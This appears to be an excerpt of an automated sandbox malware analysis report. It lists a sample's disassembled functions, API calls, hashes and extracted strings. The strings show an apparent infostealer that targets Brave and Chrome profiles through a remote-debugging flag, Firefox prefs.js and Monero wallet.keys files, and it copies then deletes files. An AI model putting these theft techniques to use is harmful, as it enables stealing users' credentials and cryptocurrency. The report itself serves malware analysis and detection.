                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-1869280968
                                    • Opcode ID: acbf11a9e60c6c0d9a2ac2afbc1bb9d4e4ee300d9254a869976e1e43fe54fef4
                                    • Instruction ID: 1a6cd9b63250dca57935c5c26676a69d6015fa8ee3acee249a66037042bc3888
                                    • Opcode Fuzzy Hash: acbf11a9e60c6c0d9a2ac2afbc1bb9d4e4ee300d9254a869976e1e43fe54fef4
                                    • Instruction Fuzzy Hash: 22524D72A001489BCB14FB71DD92EEE77BDAF54300F4185E9B50A62191EF34AB48CF62
                                    Function 00BE3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE3B1C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE3B33
                                    • lstrcat.KERNEL32(?,?), ref: 00BE3B85
                                    • StrCmpCA.SHLWAPI(?,00BF0F58), ref: 00BE3B97
                                    • StrCmpCA.SHLWAPI(?,00BF0F5C), ref: 00BE3BAD
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE3EB7
                                    • FindClose.KERNEL32(000000FF), ref: 00BE3ECC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 2e3089ecff8ca9220811665230f60cb406a23391b9d1d557dc817a9322d1ca85
                                    • Instruction ID: 6df976efe0236f7b8590b3f0f0d7c24a7f263b3b22649f0a457d33b4d8b75a43
                                    • Opcode Fuzzy Hash: 2e3089ecff8ca9220811665230f60cb406a23391b9d1d557dc817a9322d1ca85
                                    • Instruction Fuzzy Hash: 6AA15471A002489FDB24DF65DC85FEA73F8AB59700F0445C8B64D97151EB74AB88CF61
                                    Function 00BE4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE4B7C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE4B93
                                    • StrCmpCA.SHLWAPI(?,00BF0FC4), ref: 00BE4BC1
                                    • StrCmpCA.SHLWAPI(?,00BF0FC8), ref: 00BE4BD7
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE4DCD
                                    • FindClose.KERNEL32(000000FF), ref: 00BE4DE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: c6449c54d453d8fbf8cc19ac00cd7758d883343fa9ae02b50ec825200e62f6fc
                                    • Instruction ID: a2d93017f16d495a0e9d1ee29803b27e6fba71209bcd24f08209329bb2b1aeab
                                    • Opcode Fuzzy Hash: c6449c54d453d8fbf8cc19ac00cd7758d883343fa9ae02b50ec825200e62f6fc
                                    • Instruction Fuzzy Hash: 85614A71910218AFCB20EFA5DD45FEA73BCAB59700F0085D8F64996151EB70AB88CF91
                                    Function 00BE47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BE47D0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE47D7
                                    • wsprintfA.USER32 ref: 00BE47F6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE480D
                                    • StrCmpCA.SHLWAPI(?,00BF0FAC), ref: 00BE483B
                                    • StrCmpCA.SHLWAPI(?,00BF0FB0), ref: 00BE4851
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE48DB
                                    • FindClose.KERNEL32(000000FF), ref: 00BE48F0
                                    • lstrcat.KERNEL32(?,018BE598), ref: 00BE4915
                                    • lstrcat.KERNEL32(?,018BD8F0), ref: 00BE4928
                                    • lstrlen.KERNEL32(?), ref: 00BE4935
                                    • lstrlen.KERNEL32(?), ref: 00BE4946
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: a0427aafa2797cdb6e440c8fba3422ce825f45c7312ad660d37b3ec298cdd4d8
                                    • Instruction ID: 7d87e18d18e426d9e9a3de65fea1bca532a98946c8d20cecf8a28ed42aa2807f
                                    • Opcode Fuzzy Hash: a0427aafa2797cdb6e440c8fba3422ce825f45c7312ad660d37b3ec298cdd4d8
                                    • Instruction Fuzzy Hash: 67516AB15042189FC724EF71DC89FEE77BCAB59300F4045C8B649A6150EB74AB88CF51
                                    Function 00BE40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00BE4113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BE412A
                                    • StrCmpCA.SHLWAPI(?,00BF0F94), ref: 00BE4158
                                    • StrCmpCA.SHLWAPI(?,00BF0F98), ref: 00BE416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE42BC
                                    • FindClose.KERNEL32(000000FF), ref: 00BE42D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 0b03c0cf775d5ec52b2a5af56588d10700a0fd1bdea50f711d121113bf037487
                                    • Instruction ID: 795e7423492de8fb73ec7ecd4b29a58e28df14701d522b81b0f52afb164a5a6c
                                    • Opcode Fuzzy Hash: 0b03c0cf775d5ec52b2a5af56588d10700a0fd1bdea50f711d121113bf037487
                                    • Instruction Fuzzy Hash: 56516DB1904118AFCB24EBB1DC85FEE77BCBB59300F4046D9B649A6050EB75AB89CF50
                                    Function 00BDEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00BDEE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00BDEE55
                                    • StrCmpCA.SHLWAPI(?,00BF1630), ref: 00BDEEAB
                                    • StrCmpCA.SHLWAPI(?,00BF1634), ref: 00BDEEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDF3AE
                                    • FindClose.KERNEL32(000000FF), ref: 00BDF3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 5a42e385532321d189fc7b18208a1e9d4c0581ceb99d43e1db2ccc7088dc8c93
                                    • Instruction ID: 68d66da32f36266ad5067099ecd710276bff4debcfa69783264b850e85eecea4
                                    • Opcode Fuzzy Hash: 5a42e385532321d189fc7b18208a1e9d4c0581ceb99d43e1db2ccc7088dc8c93
                                    • Instruction Fuzzy Hash: 04E14F729111589ADB24FB61CDA2EEE73BDAF64300F4145E9B40A62192EF307F89CF51
                                    Function 00C10098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 69b976027ab9f553827f05f8c65ea484524638988ce69d8ed3af7ee585edbb82
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 22E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    Function 00BDF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF16B0,00BF0D97), ref: 00BDF81E
                                    • StrCmpCA.SHLWAPI(?,00BF16B4), ref: 00BDF86F
                                    • StrCmpCA.SHLWAPI(?,00BF16B8), ref: 00BDF885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDFBB1
                                    • FindClose.KERNEL32(000000FF), ref: 00BDFBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 93b0062bcdad036c5f22a29f510a33f27519fb9db3e75fc5f29e1df18274d060
                                    • Instruction ID: 57fe01e3b284e9df17df65948657513c4a7eda1e19ef6a004c6fca8b7516af02
                                    • Opcode Fuzzy Hash: 93b0062bcdad036c5f22a29f510a33f27519fb9db3e75fc5f29e1df18274d060
                                    • Instruction Fuzzy Hash: 14B12071A001589BCB24FF75DD96BEDB7BDAF54300F0085E9A50A57291EF30AB48CB92
                                    Function 00BD1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF523C,?,?,?,00BF52E4,?,?,00000000,?,00000000), ref: 00BD1963
                                    • StrCmpCA.SHLWAPI(?,00BF538C), ref: 00BD19B3
                                    • StrCmpCA.SHLWAPI(?,00BF5434), ref: 00BD19C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BD1D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BD1E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD1E60
                                    • FindClose.KERNEL32(000000FF), ref: 00BD1E72
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 1f1454ec2f913298238cd9f54da0e89a73ddef2fecb4ebd58963e6d4d2384110
                                    • Instruction ID: 1a06f80b98e5194aeb99e06057ffaa1979062d880ab902817d1de24c4d334ca3
                                    • Opcode Fuzzy Hash: 1f1454ec2f913298238cd9f54da0e89a73ddef2fecb4ebd58963e6d4d2384110
                                    • Instruction Fuzzy Hash: B912ED71910158ABCB25FB71CCA6AEE77BDAF64300F4145E9A10A62191EF307B88CF61
                                    Function 00BDDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BF0C32), ref: 00BDDF5E
                                    • StrCmpCA.SHLWAPI(?,00BF15C0), ref: 00BDDFAE
                                    • StrCmpCA.SHLWAPI(?,00BF15C4), ref: 00BDDFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDE4E0
                                    • FindClose.KERNEL32(000000FF), ref: 00BDE4F2
                                    Strings
                                    Memory Dump Source
